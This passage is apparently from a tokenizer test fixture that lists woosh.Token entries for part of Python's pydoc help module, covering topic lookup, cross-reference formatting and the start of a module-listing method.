woosh.Token(woosh.OP, ':', 2114, 45, 2114, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2114, 46, 2115, 0),
woosh.Token(woosh.INDENT, ' ', 2115, 0, 2115, 8),
woosh.Token(woosh.NAME, 'try', 2115, 8, 2115, 11),
woosh.Token(woosh.OP, ':', 2115, 11, 2115, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2115, 12, 2116, 0),
woosh.Token(woosh.INDENT, ' ', 2116, 0, 2116, 12),
woosh.Token(woosh.NAME, 'import', 2116, 12, 2116, 18),
woosh.Token(woosh.NAME, 'pydoc_data', 2116, 19, 2116, 29),
woosh.Token(woosh.OP, '.', 2116, 29, 2116, 30),
woosh.Token(woosh.NAME, 'topics', 2116, 30, 2116, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2116, 36, 2117, 0),
woosh.Token(woosh.DEDENT, ' ', 2117, 0, 2117, 8),
woosh.Token(woosh.NAME, 'except', 2117, 8, 2117, 14),
woosh.Token(woosh.NAME, 'ImportError', 2117, 15, 2117, 26),
woosh.Token(woosh.OP, ':', 2117, 26, 2117, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2117, 27, 2118, 0),
woosh.Token(woosh.INDENT, ' ', 2118, 0, 2118, 12),
woosh.Token(woosh.NAME, 'self', 2118, 12, 2118, 16),
woosh.Token(woosh.OP, '.', 2118, 16, 2118, 17),
woosh.Token(woosh.NAME, 'output', 2118, 17, 2118, 23),
woosh.Token(woosh.OP, '.', 2118, 23, 2118, 24),
woosh.Token(woosh.NAME, 'write', 2118, 24, 2118, 29),
woosh.Token(woosh.OP, '(', 2118, 29, 2118, 30),
woosh.Token(woosh.STRING, '\'\'\'\r\nSorry, topic and keyword documentation is not available because the\r\nmodule "pydoc_data.topics" could not be found.\r\n\'\'\'', 2118, 30, 2121, 3),
woosh.Token(woosh.OP, ')', 2121, 3, 2121, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2121, 4, 2122, 0),
woosh.Token(woosh.NAME, 'return', 2122, 12, 2122, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2122, 18, 2123, 0),
woosh.Token(woosh.DEDENT, ' ', 2123, 0, 2123, 8),
woosh.Token(woosh.NAME, 'target', 2123, 8, 2123, 14),
woosh.Token(woosh.OP, '=', 2123, 15, 2123, 16),
woosh.Token(woosh.NAME, 'self', 2123, 17, 2123, 21),
woosh.Token(woosh.OP, '.', 2123, 21, 2123, 22),
woosh.Token(woosh.NAME, 'topics', 2123, 22, 2123, 28),
woosh.Token(woosh.OP, '.', 2123, 28, 2123, 29),
woosh.Token(woosh.NAME, 'get', 2123, 29, 2123, 32),
woosh.Token(woosh.OP, '(', 2123, 32, 2123, 33),
woosh.Token(woosh.NAME, 'topic', 2123, 33, 2123, 38),
woosh.Token(woosh.OP, ',', 2123, 38, 2123, 39),
woosh.Token(woosh.NAME, 'self', 2123, 40, 2123, 44),
woosh.Token(woosh.OP, '.', 2123, 44, 2123, 45),
woosh.Token(woosh.NAME, 'keywords', 2123, 45, 2123, 53),
woosh.Token(woosh.OP, '.', 2123, 53, 2123, 54),
woosh.Token(woosh.NAME, 'get', 2123, 54, 2123, 57),
woosh.Token(woosh.OP, '(', 2123, 57, 2123, 58),
woosh.Token(woosh.NAME, 'topic', 2123, 58, 2123, 63),
woosh.Token(woosh.OP, ')', 2123, 63, 2123, 64),
woosh.Token(woosh.OP, ')', 2123, 64, 2123, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2123, 65, 2124, 0),
woosh.Token(woosh.NAME, 'if', 2124, 8, 2124, 10),
woosh.Token(woosh.NAME, 'not', 2124, 11, 2124, 14),
woosh.Token(woosh.NAME, 'target', 2124, 15, 2124, 21),
woosh.Token(woosh.OP, ':', 2124, 21, 2124, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2124, 22, 2125, 0),
woosh.Token(woosh.INDENT, ' ', 2125, 0, 2125, 12),
woosh.Token(woosh.NAME, 'self', 2125, 12, 2125, 16),
woosh.Token(woosh.OP, '.', 2125, 16, 2125, 17),
woosh.Token(woosh.NAME, 'output', 2125, 17, 2125, 23),
woosh.Token(woosh.OP, '.', 2125, 23, 2125, 24),
woosh.Token(woosh.NAME, 'write', 2125, 24, 2125, 29),
woosh.Token(woosh.OP, '(', 2125, 29, 2125, 30),
woosh.Token(woosh.STRING, "'no documentation found for %s\\n'", 2125, 30, 2125, 63),
woosh.Token(woosh.OP, '%', 2125, 64, 2125, 65),
woosh.Token(woosh.NAME, 'repr', 2125, 66, 2125, 70),
woosh.Token(woosh.OP, '(', 2125, 70, 2125, 71),
woosh.Token(woosh.NAME, 'topic', 2125, 71, 2125, 76),
woosh.Token(woosh.OP, ')', 2125, 76, 2125, 77),
woosh.Token(woosh.OP, ')', 2125, 77, 2125, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 2125, 78, 2126, 0),
woosh.Token(woosh.NAME, 'return', 2126, 12, 2126, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2126, 18, 2127, 0),
woosh.Token(woosh.DEDENT, ' ', 2127, 0, 2127, 8),
woosh.Token(woosh.NAME, 'if', 2127, 8, 2127, 10),
woosh.Token(woosh.NAME, 'type', 2127, 11, 2127, 15),
woosh.Token(woosh.OP, '(', 2127, 15, 2127, 16),
woosh.Token(woosh.NAME, 'target', 2127, 16, 2127, 22),
woosh.Token(woosh.OP, ')', 2127, 22, 2127, 23),
woosh.Token(woosh.NAME, 'is', 2127, 24, 2127, 26),
woosh.Token(woosh.NAME, 'type', 2127, 27, 2127, 31),
woosh.Token(woosh.OP, '(', 2127, 31, 2127, 32),
woosh.Token(woosh.STRING, "''", 2127, 32, 2127, 34),
woosh.Token(woosh.OP, ')', 2127, 34, 2127, 35),
woosh.Token(woosh.OP, ':', 2127, 35, 2127, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2127, 36, 2128, 0),
woosh.Token(woosh.INDENT, ' ', 2128, 0, 2128, 12),
woosh.Token(woosh.NAME, 'return', 2128, 12, 2128, 18),
woosh.Token(woosh.NAME, 'self', 2128, 19, 2128, 23),
woosh.Token(woosh.OP, '.', 2128, 23, 2128, 24),
woosh.Token(woosh.NAME, 'showtopic', 2128, 24, 2128, 33),
woosh.Token(woosh.OP, '(', 2128, 33, 2128, 34),
woosh.Token(woosh.NAME, 'target', 2128, 34, 2128, 40),
woosh.Token(woosh.OP, ',', 2128, 40, 2128, 41),
woosh.Token(woosh.NAME, 'more_xrefs', 2128, 42, 2128, 52),
woosh.Token(woosh.OP, ')', 2128, 52, 2128, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2128, 53, 2129, 0),
woosh.Token(woosh.DEDENT, ' ', 2130, 0, 2130, 8),
woosh.Token(woosh.NAME, 'label', 2130, 8, 2130, 13),
woosh.Token(woosh.OP, ',', 2130, 13, 2130, 14),
woosh.Token(woosh.NAME, 'xrefs', 2130, 15, 2130, 20),
woosh.Token(woosh.OP, '=', 2130, 21, 2130, 22),
woosh.Token(woosh.NAME, 'target', 2130, 23, 2130, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2130, 29, 2131, 0),
woosh.Token(woosh.NAME, 'try', 2131, 8, 2131, 11),
woosh.Token(woosh.OP, ':', 2131, 11, 2131, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2131, 12, 2132, 0),
woosh.Token(woosh.INDENT, ' ', 2132, 0, 2132, 12),
woosh.Token(woosh.NAME, 'doc', 2132, 12, 2132, 15),
woosh.Token(woosh.OP, '=', 2132, 16, 2132, 17),
woosh.Token(woosh.NAME, 'pydoc_data', 2132, 18, 2132, 28),
woosh.Token(woosh.OP, '.', 2132, 28, 2132, 29),
woosh.Token(woosh.NAME, 'topics', 2132, 29, 2132, 35),
woosh.Token(woosh.OP, '.', 2132, 35, 2132, 36),
woosh.Token(woosh.NAME, 'topics', 2132, 36, 2132, 42),
woosh.Token(woosh.OP, '[', 2132, 42, 2132, 43),
woosh.Token(woosh.NAME, 'label', 2132, 43, 2132, 48),
woosh.Token(woosh.OP, ']', 2132, 48, 2132, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2132, 49, 2133, 0),
woosh.Token(woosh.DEDENT, ' ', 2133, 0, 2133, 8),
woosh.Token(woosh.NAME, 'except', 2133, 8, 2133, 14),
woosh.Token(woosh.NAME, 'KeyError', 2133, 15, 2133, 23),
woosh.Token(woosh.OP, ':', 2133, 23, 2133, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2133, 24, 2134, 0),
woosh.Token(woosh.INDENT, ' ', 2134, 0, 2134, 12),
woosh.Token(woosh.NAME, 'self', 2134, 12, 2134, 16),
woosh.Token(woosh.OP, '.', 2134, 16, 2134, 17),
woosh.Token(woosh.NAME, 'output', 2134, 17, 2134, 23),
woosh.Token(woosh.OP, '.', 2134, 23, 2134, 24),
woosh.Token(woosh.NAME, 'write', 2134, 24, 2134, 29),
woosh.Token(woosh.OP, '(', 2134, 29, 2134, 30),
woosh.Token(woosh.STRING, "'no documentation found for %s\\n'", 2134, 30, 2134, 63),
woosh.Token(woosh.OP, '%', 2134, 64, 2134, 65),
woosh.Token(woosh.NAME, 'repr', 2134, 66, 2134, 70),
woosh.Token(woosh.OP, '(', 2134, 70, 2134, 71),
woosh.Token(woosh.NAME, 'topic', 2134, 71, 2134, 76),
woosh.Token(woosh.OP, ')', 2134, 76, 2134, 77),
woosh.Token(woosh.OP, ')', 2134, 77, 2134, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 2134, 78, 2135, 0),
woosh.Token(woosh.NAME, 'return', 2135, 12, 2135, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2135, 18, 2136, 0),
woosh.Token(woosh.DEDENT, ' ', 2136, 0, 2136, 8),
woosh.Token(woosh.NAME, 'doc', 2136, 8, 2136, 11),
woosh.Token(woosh.OP, '=', 2136, 12, 2136, 13),
woosh.Token(woosh.NAME, 'doc', 2136, 14, 2136, 17),
woosh.Token(woosh.OP, '.', 2136, 17, 2136, 18),
woosh.Token(woosh.NAME, 'strip', 2136, 18, 2136, 23),
woosh.Token(woosh.OP, '(', 2136, 23, 2136, 24),
woosh.Token(woosh.OP, ')', 2136, 24, 2136, 25),
woosh.Token(woosh.OP, '+', 2136, 26, 2136, 27),
woosh.Token(woosh.STRING, "'\\n'", 2136, 28, 2136, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2136, 32, 2137, 0),
woosh.Token(woosh.NAME, 'if', 2137, 8, 2137, 10),
woosh.Token(woosh.NAME, 'more_xrefs', 2137, 11, 2137, 21),
woosh.Token(woosh.OP, ':', 2137, 21, 2137, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2137, 22, 2138, 0),
woosh.Token(woosh.INDENT, ' ', 2138, 0, 2138, 12),
woosh.Token(woosh.NAME, 'xrefs', 2138, 12, 2138, 17),
woosh.Token(woosh.OP, '=', 2138, 18, 2138, 19),
woosh.Token(woosh.OP, '(', 2138, 20, 2138, 21),
woosh.Token(woosh.NAME, 'xrefs', 2138, 21, 2138, 26),
woosh.Token(woosh.NAME, 'or', 2138, 27, 2138, 29),
woosh.Token(woosh.STRING, "''", 2138, 30, 2138, 32),
woosh.Token(woosh.OP, ')', 2138, 32, 2138, 33),
woosh.Token(woosh.OP, '+', 2138, 34, 2138, 35),
woosh.Token(woosh.STRING, "' '", 2138, 36, 2138, 39),
woosh.Token(woosh.OP, '+', 2138, 40, 2138, 41),
woosh.Token(woosh.NAME, 'more_xrefs', 2138, 42, 2138, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2138, 52, 2139, 0),
woosh.Token(woosh.DEDENT, ' ', 2139, 0, 2139, 8),
woosh.Token(woosh.NAME, 'if', 2139, 8, 2139, 10),
woosh.Token(woosh.NAME, 'xrefs', 2139, 11, 2139, 16),
woosh.Token(woosh.OP, ':', 2139, 16, 2139, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2139, 17, 2140, 0),
woosh.Token(woosh.INDENT, ' ', 2140, 0, 2140, 12),
woosh.Token(woosh.NAME, 'import', 2140, 12, 2140, 18),
woosh.Token(woosh.NAME, 'textwrap', 2140, 19, 2140, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2140, 27, 2141, 0),
woosh.Token(woosh.NAME, 'text', 2141, 12, 2141, 16),
woosh.Token(woosh.OP, '=', 2141, 17, 2141, 18),
woosh.Token(woosh.STRING, "'Related help topics: '", 2141, 19, 2141, 42),
woosh.Token(woosh.OP, '+', 2141, 43, 2141, 44),
woosh.Token(woosh.STRING, "', '", 2141, 45, 2141, 49),
woosh.Token(woosh.OP, '.', 2141, 49, 2141, 50),
woosh.Token(woosh.NAME, 'join', 2141, 50, 2141, 54),
woosh.Token(woosh.OP, '(', 2141, 54, 2141, 55),
woosh.Token(woosh.NAME, 'xrefs', 2141, 55, 2141, 60),
woosh.Token(woosh.OP, '.', 2141, 60, 2141, 61),
woosh.Token(woosh.NAME, 'split', 2141, 61, 2141, 66),
woosh.Token(woosh.OP, '(', 2141, 66, 2141, 67),
woosh.Token(woosh.OP, ')', 2141, 67, 2141, 68),
woosh.Token(woosh.OP, ')', 2141, 68, 2141, 69),
woosh.Token(woosh.OP, '+', 2141, 70, 2141, 71),
woosh.Token(woosh.STRING, "'\\n'", 2141, 72, 2141, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 2141, 76, 2142, 0),
woosh.Token(woosh.NAME, 'wrapped_text', 2142, 12, 2142, 24),
woosh.Token(woosh.OP, '=', 2142, 25, 2142, 26),
woosh.Token(woosh.NAME, 'textwrap', 2142, 27, 2142, 35),
woosh.Token(woosh.OP, '.', 2142, 35, 2142, 36),
woosh.Token(woosh.NAME, 'wrap', 2142, 36, 2142, 40),
woosh.Token(woosh.OP, '(', 2142, 40, 2142, 41),
woosh.Token(woosh.NAME, 'text', 2142, 41, 2142, 45),
woosh.Token(woosh.OP, ',', 2142, 45, 2142, 46),
woosh.Token(woosh.NUMBER, '72', 2142, 47, 2142, 49),
woosh.Token(woosh.OP, ')', 2142, 49, 2142, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 2142, 50, 2143, 0),
woosh.Token(woosh.NAME, 'doc', 2143, 12, 2143, 15),
woosh.Token(woosh.OP, '+=', 2143, 16, 2143, 18),
woosh.Token(woosh.STRING, "'\\n%s\\n'", 2143, 19, 2143, 27),
woosh.Token(woosh.OP, '%', 2143, 28, 2143, 29),
woosh.Token(woosh.STRING, "'\\n'", 2143, 30, 2143, 34),
woosh.Token(woosh.OP, '.', 2143, 34, 2143, 35),
woosh.Token(woosh.NAME, 'join', 2143, 35, 2143, 39),
woosh.Token(woosh.OP, '(', 2143, 39, 2143, 40),
woosh.Token(woosh.NAME, 'wrapped_text', 2143, 40, 2143, 52),
woosh.Token(woosh.OP, ')', 2143, 52, 2143, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2143, 53, 2144, 0),
woosh.Token(woosh.DEDENT, ' ', 2144, 0, 2144, 8),
woosh.Token(woosh.NAME, 'pager', 2144, 8, 2144, 13),
woosh.Token(woosh.OP, '(', 2144, 13, 2144, 14),
woosh.Token(woosh.NAME, 'doc', 2144, 14, 2144, 17),
woosh.Token(woosh.OP, ')', 2144, 17, 2144, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2144, 18, 2145, 0),
woosh.Token(woosh.DEDENT, ' ', 2146, 0, 2146, 4),
woosh.Token(woosh.NAME, 'def', 2146, 4, 2146, 7),
woosh.Token(woosh.NAME, '_gettopic', 2146, 8, 2146, 17),
woosh.Token(woosh.OP, '(', 2146, 17, 2146, 18),
woosh.Token(woosh.NAME, 'self', 2146, 18, 2146, 22),
woosh.Token(woosh.OP, ',', 2146, 22, 2146, 23),
woosh.Token(woosh.NAME, 'topic', 2146, 24, 2146, 29),
woosh.Token(woosh.OP, ',', 2146, 29, 2146, 30),
woosh.Token(woosh.NAME, 'more_xrefs', 2146, 31, 2146, 41),
woosh.Token(woosh.OP, '=', 2146, 41, 2146, 42),
woosh.Token(woosh.STRING, "''", 2146, 42, 2146, 44),
woosh.Token(woosh.OP, ')', 2146, 44, 2146, 45),
woosh.Token(woosh.OP, ':', 2146, 45, 2146, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2146, 46, 2147, 0),
woosh.Token(woosh.INDENT, ' ', 2147, 0, 2147, 8),
woosh.Token(woosh.STRING, '"""Return unbuffered tuple of (topic, xrefs).\r\n\r\n If an error occurs here, the exception is caught and displayed by\r\n the url handler.\r\n\r\n This function duplicates the showtopic method but returns its\r\n result directly so it can be formatted for display in an html page.\r\n """', 2147, 8, 2154, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 2154, 11, 2155, 0),
woosh.Token(woosh.NAME, 'try', 2155, 8, 2155, 11),
woosh.Token(woosh.OP, ':', 2155, 11, 2155, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2155, 12, 2156, 0),
woosh.Token(woosh.INDENT, ' ', 2156, 0, 2156, 12),
woosh.Token(woosh.NAME, 'import', 2156, 12, 2156, 18),
woosh.Token(woosh.NAME, 'pydoc_data', 2156, 19, 2156, 29),
woosh.Token(woosh.OP, '.', 2156, 29, 2156, 30),
woosh.Token(woosh.NAME, 'topics', 2156, 30, 2156, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2156, 36, 2157, 0),
woosh.Token(woosh.DEDENT, ' ', 2157, 0, 2157, 8),
woosh.Token(woosh.NAME, 'except', 2157, 8, 2157, 14),
woosh.Token(woosh.NAME, 'ImportError', 2157, 15, 2157, 26),
woosh.Token(woosh.OP, ':', 2157, 26, 2157, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2157, 27, 2158, 0),
woosh.Token(woosh.INDENT, ' ', 2158, 0, 2158, 12),
woosh.Token(woosh.NAME, 'return', 2158, 12, 2158, 18),
woosh.Token(woosh.OP, '(', 2158, 18, 2158, 19),
woosh.Token(woosh.STRING, '\'\'\'\r\nSorry, topic and keyword documentation is not available because the\r\nmodule "pydoc_data.topics" could not be found.\r\n\'\'\'', 2158, 19, 2161, 3),
woosh.Token(woosh.OP, ',', 2161, 4, 2161, 5),
woosh.Token(woosh.STRING, "''", 2161, 6, 2161, 8),
woosh.Token(woosh.OP, ')', 2161, 8, 2161, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 2161, 9, 2162, 0),
woosh.Token(woosh.DEDENT, ' ', 2162, 0, 2162, 8),
woosh.Token(woosh.NAME, 'target', 2162, 8, 2162, 14),
woosh.Token(woosh.OP, '=', 2162, 15, 2162, 16),
woosh.Token(woosh.NAME, 'self', 2162, 17, 2162, 21),
woosh.Token(woosh.OP, '.', 2162, 21, 2162, 22),
woosh.Token(woosh.NAME, 'topics', 2162, 22, 2162, 28),
woosh.Token(woosh.OP, '.', 2162, 28, 2162, 29),
woosh.Token(woosh.NAME, 'get', 2162, 29, 2162, 32),
woosh.Token(woosh.OP, '(', 2162, 32, 2162, 33),
woosh.Token(woosh.NAME, 'topic', 2162, 33, 2162, 38),
woosh.Token(woosh.OP, ',', 2162, 38, 2162, 39),
woosh.Token(woosh.NAME, 'self', 2162, 40, 2162, 44),
woosh.Token(woosh.OP, '.', 2162, 44, 2162, 45),
woosh.Token(woosh.NAME, 'keywords', 2162, 45, 2162, 53),
woosh.Token(woosh.OP, '.', 2162, 53, 2162, 54),
woosh.Token(woosh.NAME, 'get', 2162, 54, 2162, 57),
woosh.Token(woosh.OP, '(', 2162, 57, 2162, 58),
woosh.Token(woosh.NAME, 'topic', 2162, 58, 2162, 63),
woosh.Token(woosh.OP, ')', 2162, 63, 2162, 64),
woosh.Token(woosh.OP, ')', 2162, 64, 2162, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2162, 65, 2163, 0),
woosh.Token(woosh.NAME, 'if', 2163, 8, 2163, 10),
woosh.Token(woosh.NAME, 'not', 2163, 11, 2163, 14),
woosh.Token(woosh.NAME, 'target', 2163, 15, 2163, 21),
woosh.Token(woosh.OP, ':', 2163, 21, 2163, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2163, 22, 2164, 0),
woosh.Token(woosh.INDENT, ' ', 2164, 0, 2164, 12),
woosh.Token(woosh.NAME, 'raise', 2164, 12, 2164, 17),
woosh.Token(woosh.NAME, 'ValueError', 2164, 18, 2164, 28),
woosh.Token(woosh.OP, '(', 2164, 28, 2164, 29),
woosh.Token(woosh.STRING, "'could not find topic'", 2164, 29, 2164, 51),
woosh.Token(woosh.OP, ')', 2164, 51, 2164, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2164, 52, 2165, 0),
woosh.Token(woosh.DEDENT, ' ', 2165, 0, 2165, 8),
woosh.Token(woosh.NAME, 'if', 2165, 8, 2165, 10),
woosh.Token(woosh.NAME, 'isinstance', 2165, 11, 2165, 21),
woosh.Token(woosh.OP, '(', 2165, 21, 2165, 22),
woosh.Token(woosh.NAME, 'target', 2165, 22, 2165, 28),
woosh.Token(woosh.OP, ',', 2165, 28, 2165, 29),
woosh.Token(woosh.NAME, 'str', 2165, 30, 2165, 33),
woosh.Token(woosh.OP, ')', 2165, 33, 2165, 34),
woosh.Token(woosh.OP, ':', 2165, 34, 2165, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2165, 35, 2166, 0),
woosh.Token(woosh.INDENT, ' ', 2166, 0, 2166, 12),
woosh.Token(woosh.NAME, 'return', 2166, 12, 2166, 18),
woosh.Token(woosh.NAME, 'self', 2166, 19, 2166, 23),
woosh.Token(woosh.OP, '.', 2166, 23, 2166, 24),
woosh.Token(woosh.NAME, '_gettopic', 2166, 24, 2166, 33),
woosh.Token(woosh.OP, '(', 2166, 33, 2166, 34),
woosh.Token(woosh.NAME, 'target', 2166, 34, 2166, 40),
woosh.Token(woosh.OP, ',', 2166, 40, 2166, 41),
woosh.Token(woosh.NAME, 'more_xrefs', 2166, 42, 2166, 52),
woosh.Token(woosh.OP, ')', 2166, 52, 2166, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2166, 53, 2167, 0),
woosh.Token(woosh.DEDENT, ' ', 2167, 0, 2167, 8),
woosh.Token(woosh.NAME, 'label', 2167, 8, 2167, 13),
woosh.Token(woosh.OP, ',', 2167, 13, 2167, 14),
woosh.Token(woosh.NAME, 'xrefs', 2167, 15, 2167, 20),
woosh.Token(woosh.OP, '=', 2167, 21, 2167, 22),
woosh.Token(woosh.NAME, 'target', 2167, 23, 2167, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2167, 29, 2168, 0),
woosh.Token(woosh.NAME, 'doc', 2168, 8, 2168, 11),
woosh.Token(woosh.OP, '=', 2168, 12, 2168, 13),
woosh.Token(woosh.NAME, 'pydoc_data', 2168, 14, 2168, 24),
woosh.Token(woosh.OP, '.', 2168, 24, 2168, 25),
woosh.Token(woosh.NAME, 'topics', 2168, 25, 2168, 31),
woosh.Token(woosh.OP, '.', 2168, 31, 2168, 32),
woosh.Token(woosh.NAME, 'topics', 2168, 32, 2168, 38),
woosh.Token(woosh.OP, '[', 2168, 38, 2168, 39),
woosh.Token(woosh.NAME, 'label', 2168, 39, 2168, 44),
woosh.Token(woosh.OP, ']', 2168, 44, 2168, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2168, 45, 2169, 0),
woosh.Token(woosh.NAME, 'if', 2169, 8, 2169, 10),
woosh.Token(woosh.NAME, 'more_xrefs', 2169, 11, 2169, 21),
woosh.Token(woosh.OP, ':', 2169, 21, 2169, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2169, 22, 2170, 0),
woosh.Token(woosh.INDENT, ' ', 2170, 0, 2170, 12),
woosh.Token(woosh.NAME, 'xrefs', 2170, 12, 2170, 17),
woosh.Token(woosh.OP, '=', 2170, 18, 2170, 19),
woosh.Token(woosh.OP, '(', 2170, 20, 2170, 21),
woosh.Token(woosh.NAME, 'xrefs', 2170, 21, 2170, 26),
woosh.Token(woosh.NAME, 'or', 2170, 27, 2170, 29),
woosh.Token(woosh.STRING, "''", 2170, 30, 2170, 32),
woosh.Token(woosh.OP, ')', 2170, 32, 2170, 33),
woosh.Token(woosh.OP, '+', 2170, 34, 2170, 35),
woosh.Token(woosh.STRING, "' '", 2170, 36, 2170, 39),
woosh.Token(woosh.OP, '+', 2170, 40, 2170, 41),
woosh.Token(woosh.NAME, 'more_xrefs', 2170, 42, 2170, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2170, 52, 2171, 0),
woosh.Token(woosh.DEDENT, ' ', 2171, 0, 2171, 8),
woosh.Token(woosh.NAME, 'return', 2171, 8, 2171, 14),
woosh.Token(woosh.NAME, 'doc', 2171, 15, 2171, 18),
woosh.Token(woosh.OP, ',', 2171, 18, 2171, 19),
woosh.Token(woosh.NAME, 'xrefs', 2171, 20, 2171, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2171, 25, 2172, 0),
woosh.Token(woosh.DEDENT, ' ', 2173, 0, 2173, 4),
woosh.Token(woosh.NAME, 'def', 2173, 4, 2173, 7),
woosh.Token(woosh.NAME, 'showsymbol', 2173, 8, 2173, 18),
woosh.Token(woosh.OP, '(', 2173, 18, 2173, 19),
woosh.Token(woosh.NAME, 'self', 2173, 19, 2173, 23),
woosh.Token(woosh.OP, ',', 2173, 23, 2173, 24),
woosh.Token(woosh.NAME, 'symbol', 2173, 25, 2173, 31),
woosh.Token(woosh.OP, ')', 2173, 31, 2173, 32),
woosh.Token(woosh.OP, ':', 2173, 32, 2173, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2173, 33, 2174, 0),
woosh.Token(woosh.INDENT, ' ', 2174, 0, 2174, 8),
woosh.Token(woosh.NAME, 'target', 2174, 8, 2174, 14),
woosh.Token(woosh.OP, '=', 2174, 15, 2174, 16),
woosh.Token(woosh.NAME, 'self', 2174, 17, 2174, 21),
woosh.Token(woosh.OP, '.', 2174, 21, 2174, 22),
woosh.Token(woosh.NAME, 'symbols', 2174, 22, 2174, 29),
woosh.Token(woosh.OP, '[', 2174, 29, 2174, 30),
woosh.Token(woosh.NAME, 'symbol', 2174, 30, 2174, 36),
woosh.Token(woosh.OP, ']', 2174, 36, 2174, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2174, 37, 2175, 0),
woosh.Token(woosh.NAME, 'topic', 2175, 8, 2175, 13),
woosh.Token(woosh.OP, ',', 2175, 13, 2175, 14),
woosh.Token(woosh.NAME, '_', 2175, 15, 2175, 16),
woosh.Token(woosh.OP, ',', 2175, 16, 2175, 17),
woosh.Token(woosh.NAME, 'xrefs', 2175, 18, 2175, 23),
woosh.Token(woosh.OP, '=', 2175, 24, 2175, 25),
woosh.Token(woosh.NAME, 'target', 2175, 26, 2175, 32),
woosh.Token(woosh.OP, '.', 2175, 32, 2175, 33),
woosh.Token(woosh.NAME, 'partition', 2175, 33, 2175, 42),
woosh.Token(woosh.OP, '(', 2175, 42, 2175, 43),
woosh.Token(woosh.STRING, "' '", 2175, 43, 2175, 46),
woosh.Token(woosh.OP, ')', 2175, 46, 2175, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2175, 47, 2176, 0),
woosh.Token(woosh.NAME, 'self', 2176, 8, 2176, 12),
woosh.Token(woosh.OP, '.', 2176, 12, 2176, 13),
woosh.Token(woosh.NAME, 'showtopic', 2176, 13, 2176, 22),
woosh.Token(woosh.OP, '(', 2176, 22, 2176, 23),
woosh.Token(woosh.NAME, 'topic', 2176, 23, 2176, 28),
woosh.Token(woosh.OP, ',', 2176, 28, 2176, 29),
woosh.Token(woosh.NAME, 'xrefs', 2176, 30, 2176, 35),
woosh.Token(woosh.OP, ')', 2176, 35, 2176, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2176, 36, 2177, 0),
woosh.Token(woosh.DEDENT, ' ', 2178, 0, 2178, 4),
woosh.Token(woosh.NAME, 'def', 2178, 4, 2178, 7),
woosh.Token(woosh.NAME, 'listmodules', 2178, 8, 2178, 19),
woosh.Token(woosh.OP, '(', 2178, 19, 2178, 20),
woosh.Token(woosh.NAME, 'self', 2178, 20, 2178, 24),
woosh.Token(woosh.OP, ',', 2178, 24, 2178, 25),
woosh.Token(woosh.NAME, 'key', 2178, 26, 2178, 29),
woosh.Token(woosh.OP, '=', 2178, 29, 2178, 30),
woosh.Token(woosh.STRING, "''", 2178, 30, 2178, 32),
woosh.Token(woosh.OP, ')', 2178, 32, 2178, 33),
woosh.Token(woosh.OP, ':', 2178, 33, 2178, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2178, 34, 2179, 0),
woosh.Token(woosh.INDENT, ' ', 2179, 0, 2179, 8),
woosh.Token(woosh.NAME, 'if', 2179, 8, 2179, 10),
woosh.Token(woosh.NAME, 'key', 2179, 11, 2179, 14),
woosh.Token(woosh.OP, ':', 2179, 14, 2179, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 2179, 15, 2180, 0),
woosh.Token(woosh.INDENT, ' ', 2180, 0, 2180, 12),
woosh.Token(woosh.NAME, 'self', 2180, 12, 2180, 16),
woosh.Token(woosh.OP, '.', 2180, 16, 2180, 17),
woosh.Token(woosh.NAME, 'output', 2180, 17, 2180, 23),
woosh.Token(woosh.OP, '.', 2180, 23, 2180, 24),
woosh.Token(woosh.NAME, 'write', 2180, 24, 2180, 29),
woosh.Token(woosh.OP, '(', 2180, 29, 2180, 30),
woosh.Token(woosh.STRING, "'''\r\nHere is a list of modules whose name or summary contains '{}'.\r\nIf there are any, enter a module name to get more help.\r\n\r\n'''", 2180, 30, 2184, 3),
woosh.Token(woosh.OP, '.', 2184, 3, 2184, 4),
woosh.Token(woosh.NAME, 'format', 2184, 4, 2184, 10),
woosh.Token(woosh.OP, '(', 2184, 10, 2184, 11),
woosh.Token(woosh.NAME, 'key', 2184, 11, 2184, 14),
